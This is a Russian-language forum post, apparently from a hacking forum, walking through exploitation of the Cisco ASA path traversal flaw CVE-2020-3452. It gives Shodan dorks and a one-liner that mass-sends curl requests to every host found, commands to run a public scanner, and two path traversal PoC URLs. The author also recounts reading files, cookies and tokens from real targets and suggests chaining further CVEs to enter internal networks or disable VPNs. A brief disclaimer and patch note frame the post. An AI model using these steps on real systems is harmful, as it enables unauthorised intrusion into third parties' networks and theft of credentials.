Приветствую Друзей,Уважаемых Форумчан и Читателей Форума.
Сегодня поговорим немного о нашумевшей уязвимости в Cisco
Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.
Эксперт из Positive Technologies не впервые находит опасные уязвимости.
Данная уязвимость касается межсетевого экрана Cisco ASA.
И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.
Компания Cisco срочно выпустила патч,но как всегда не все читают новости.
И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.
Администрация Форума и автор обзора напоминают о соблюдении законодательства.
Запрещено применение рассматриваемых методик атак в незаконных целях.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Для нахождения уязвимых целей воспользуемся поисковиком shodan.
Интерес представляют следующие версии:
Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14
Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0
Запросы для поисковика:
+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+
Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.
И выполнить поиск из терминала:
Код:
# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k "https://$host/+CSCOT+/translation-tab..." ; doneПроверка на уязвимость CVE-2020-3452
Очень удобным оказался для этого сканер от PR3R00T из Англии.
Прилагается файл urls.txt ,который чистим и заполняем списком своих целей
Формат заполнения: https://IP-цели,либо https:// сайт и домен
Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:
Код:
# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt
Эксплуатация
Работать будем с Burpsuite,но может кому пригодиться и exploit
Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.
Впрочем,аналогично может обработать целый список хостов.
В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :
Код:
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lualogo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen
Здесь,к примеру,найдены cookie ,token и прочее:
Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259
Она позволяет ввалиться во внутреннюю сеть атакуемой организации.
А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.
Далеко так заходить конечно не станем.
У другой цели была обнаружена вот такая страница авторизации.
И результат атаки:
Здесь без комментариев:
Просматриваем useralert:
Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:
Защита
Защитное программное обеспечение от данной уязвимости с описанием
Ссылка скрыта от гостей
Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.
Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.
Тестируемые ресурсы живы и невридимы,им не причинено ущерба.
Благодарю всех за внимание и до новых встреч.
